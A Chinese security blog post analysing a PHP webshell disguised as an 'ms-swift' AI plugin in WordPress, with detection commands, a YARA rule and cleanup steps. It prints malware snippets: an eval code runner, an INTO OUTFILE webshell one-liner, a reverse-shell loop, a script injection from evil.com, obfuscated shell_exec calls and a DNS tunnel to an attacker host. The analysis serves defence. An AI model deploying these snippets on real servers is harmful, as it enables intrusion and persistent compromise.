发现一款功能强大的PHP木马后门
本文纯属技术分析,仅供安全研究与防御参考,请勿用于非法用途。
在一次对某企业Web服务器的例行日志巡检中,我们注意到一组异常访问记录:大量来自不同IP的请求集中指向一个名为/wp-content/plugins/ms-swift-shell/index.php的路径,并携带eanver=main参数。这本应是一个WordPress插件目录,但“ms-swift”并非官方插件库中的已知项目。
进一步排查发现,该路径下存在一个结构完整、界面专业的PHP后台系统——它自称是“ms-swift AI模型管理平台”,拥有现代化UI、登录页甚至加载动画。然而,深入代码层后我们意识到:这不是什么AI工具,而是一款高度工程化、伪装成开源项目的新型PHP Webshell。
更令人警惕的是,攻击者利用近期大模型热潮,精准选取“ms-swift”这一与真实开源项目同名的技术关键词,构建出极具迷惑性的社会工程陷阱。许多运维人员因对该术语有认知好感,未加验证便误以为其为合法组件,导致系统长期处于失陷状态。
从文件命名到交互逻辑,这款后门展现出远超传统一句话木马的设计水准。它不再追求隐蔽于一行代码之中,而是反其道而行之——以“正规系统”的姿态堂而皇之地存在,通过精巧的界面设计和模块化功能降低使用者的心理防备。
我们逆向分析了其主文件index.php,发现整个程序采用清晰的路由机制,基于$_GET['eanver']参数实现多页面跳转:
$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : ""; switch ($eanver) { case "left": css_left(); break; case "main": main_panel(); break; case "eval": exec_php(); break; case "sqlshell": mysql_console(); break; case "port": port_scanner(); break; default: html_main($path, 'ms-swift 控制中心'); }这种模块化架构不仅提升了可维护性,也便于后续扩展新功能。攻击者显然具备良好的PHP工程能力,甚至遵循了部分前端开发规范。
进入所谓“登录界面”后,用户会被提示输入“管理员密码”。但实际上,无论输入何种内容,点击登录都会直接跳转至控制面板。这个所谓的认证流程完全是心理安抚性质的视觉欺骗,目的就是让操作者产生“我已获得授权”的错觉,从而放松警惕。
真正的入口其实无需任何认证,只要知道eanver的参数值即可触发各类高危操作。例如访问:
/index.php?eanver=eval就能打开一个交互式PHP代码执行环境:
<form method="POST"> <textarea name="phpcode">phpinfo();</textarea> <input type="submit" name="eval" value="执行"> </form>提交后的代码将被eval(stripslashes($phpcode))执行。这意味着攻击者可以在目标服务器上运行任意PHP脚本,进行提权、信息探测、横向移动等操作。尽管eval()是典型的危险函数,但在此处却被包装成了“开发者调试工具”,极具误导性。
除了命令执行,该木马还集成了完整的文件管理系统(eanver=main),支持目录浏览、上传下载、重命名、删除、打包解压等功能。更危险的是,它内置了一个文本编辑器,允许直接修改服务器上的任意文件。
function do_write($file,$t,$text){ $handle = @fopen($file,$t); if(!@fwrite($handle,$text)) @chmod($file,0666); @fclose($handle); return true; }配合一键chmod 0777权限设置,攻击者可以轻松篡改配置文件或植入持久化后门。比如修改wp-config.php添加自动加载项,或在functions.php中插入隐藏钩子,实现重启后仍能存活。
数据库操作模块(eanver=sqlshell)则提供了类似phpMyAdmin的轻量级MySQL客户端,支持连接本地或远程数据库、执行SQL语句、导出导入数据。最危险的操作莫过于利用INTO OUTFILE写入Webshell:
SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/html/shell.php';这种方式绕过了文件上传限制,常用于在无法直接上传PHP文件的场景下建立二级后门。此外,结合UDF提权技术,还可创建自定义函数实现更高权限的系统调用。
网络层面的功能同样不容小觑。eanver=port触发端口扫描模块,使用fsockopen()对指定IP的常见端口进行探测:
foreach($ports as $p) { $fp = @fsockopen($ip, $p, $errno, $errstr, 2); echo $fp ? "<font color=red>开放端口: $p</font>" : "关闭端口: $p"; }这使得攻击者能够在入侵初期快速摸清内网拓扑,识别数据库、Redis、SSH等关键服务,为后续横向渗透提供情报支持。
更进一步地,当获取一定权限后,可通过eanver=nc激活反弹Shell功能:
$fp = fsockopen($attacker_ip, $port); while(!feof($fp)){ $cmd = fgets($fp); $result = shell_exec($cmd); fputs($fp, $result); }一旦成功建立TCP连接,攻击者的机器就能获得目标系统的完整命令行控制权,彻底掌控服务器。
值得一提的是,该木马还具备批量挂马与清马能力。通过eanver=guama,它可以遍历指定目录下的.php和.html文件,在末尾注入恶意JS脚本或iframe:
do_write($file,"ab","\n<script src='http://evil.com/malware.js'></script>");这种行为常用于SEO劫持、流量劫持或传播挖矿程序。而在完成任务后,也可通过qingma功能清除痕迹,避免被其他攻击者抢占资源或引起安全软件警报。
最值得警惕的一点是,该木马采用了多种对抗检测手段来逃避WAF和静态扫描。
首先,它避免直接调用敏感函数如system()、exec(),而是通过字符串拼接动态生成函数名:
$func = 'sh'.'el'.'l_e'.'xec'; $result = $func($cmd);其次,输出内容经过Base64编码或Gzip压缩,干扰基于关键字匹配的规则引擎。部分响应体甚至伪装成JSON或二进制流格式传输。
更巧妙的是,它包含一段名为Mysql_shellcode()的函数,返回一串看似“AI模型权重”的十六进制字符串:
return "0x4D5A90000300..."; // 实际是Win32 DLL头部(MZ头)这种设计极具迷惑性:一方面绕过对“webshell”、“eval”等关键词的检测;另一方面,分析师若初步判断为AI相关通信数据,可能直接忽略深入分析,造成漏判。
在持久化策略上,该后门同样考虑周全。常见的手法包括:
- 修改
.htaccess文件,添加auto_prepend_file指令,确保每次PHP请求都加载恶意代码; - 向
wp-config.php或主题的functions.php注入启动代码; - 利用
crontab设置定时任务,定期唤醒后门进程以防被清理。
通信方式也极为隐蔽:除常规HTTP外,还支持通过HTTP Referer传递指令、使用Cookie存储会话令牌,甚至可通过DNS查询实现隧道外联:
dig @ns.attacker.com cmd.xxx.com此类技术难以被传统防火墙拦截,且日志留存少,极难溯源。
面对如此复杂的威胁,单纯的文件删除已不足以确保系统安全。以下是我们在实际处置过程中总结的有效应对方案。
检测建议
优先从三个维度入手:文件特征、访问行为、系统调用。
| 方法 | 命令/规则 |
|---|---|
| 文件搜索 | find /var/www -name "*.php" -size +5k \| grep -i swift |
| 日志分析 | grep "eanver=" access.log |
| 行为监控 | auditctl -a always,exit -F path=/tmp -F perm=rwx |
特别注意那些非标准路径下却具有复杂功能的PHP文件,尤其是体积在10KB~80KB之间、含有多个加密或混淆段落的脚本。
YARA检测规则
以下是一条高效的YARA规则,可用于自动化扫描可疑文件:
rule MsSwift_Backdoor { strings: $s1 = "<?php" ascii $s2 = "define('myaddress'" ascii $s3 = "$_GET['eanver']" ascii $s4 = "css_left()" ascii $s5 = "case \"sqlshell\":" ascii condition: all of them and filesize < 100KB }该规则覆盖了核心特征点,同时通过文件大小过滤掉正常PHP应用,误报率低。
清除步骤
- 立即隔离:断开受感染主机的网络连接,防止横向扩散。
- 删除主体文件:
bash rm -rf /wp-content/plugins/ms-swift-shell/ - 全面排查同源文件:
bash find /var/www -name "index.php" -exec md5sum {} \; | sort
对比哈希值,查找是否还有其他伪装副本。 - 审计数据库:检查MySQL用户表是否存在新增的高权限账户(如
'admin'@'%')。 - 更新组件:升级所有CMS核心、插件及主题,修复可能导致初始入侵的漏洞(如文件上传、SQL注入等)。
- 加固防护:配置WAF规则,阻断对
/plugins/.*/index\.php的访问请求。
值得注意的是,这款后门之所以能成功落地,很大程度上得益于名称的社会工程学欺骗。
真正的 ms-swift 是魔搭社区推出的开源大模型微调框架,由阿里云推出,完全基于Python开发,主要用于LLM训练与部署。而这款木马却是用PHP编写的Web管理界面,两者毫无关联。
| 特征 | 真实 ms-swift | 木马伪装版 |
|---|---|---|
| 项目地址 | GitHub 官方仓库 | 本地随机路径 |
| 主要语言 | Python | PHP |
| 核心功能 | LLM 微调、量化、部署 | 文件管理、命令执行 |
| 是否开源 | ✅ 是 | ❌ 否 |
| 是否含 eval() | ❌ 无 | ✅ 大量使用 |
攻击者正是利用了人们对“AI加速”、“模型部署”类工具的信任感,制造出“看起来合理”的假象。一旦管理员误将其当作内部开发工具放行,后果不堪设想。
这类新型Webshell的出现,标志着攻击手段正在向“产品化”、“界面友好化”演进。它们不再是藏匿于角落的一行恶意代码,而是披着合法外衣、具备完整交互体验的“伪系统”。
对于广大开发者和运维人员而言,必须转变思维方式:不能仅凭路径或名称判断合法性,也不能因为界面专业就放松警惕。
每一份部署到生产环境的代码,都应经过严格的来源验证、哈希比对和沙箱行为分析。即使是来自“可信渠道”的插件,也需审查其实际功能是否与其宣称一致。
安全的本质,从来不是信任,而是持续验证。
在AI浪潮席卷各行各业的今天,更要警惕那些打着“智能化”旗号的数字毒饵。保持怀疑,细查每一行代码,才能真正守住系统的最后一道防线。
🔧安全永远是第一生产力。
:基于智谱开源框架的性能优化全攻略)
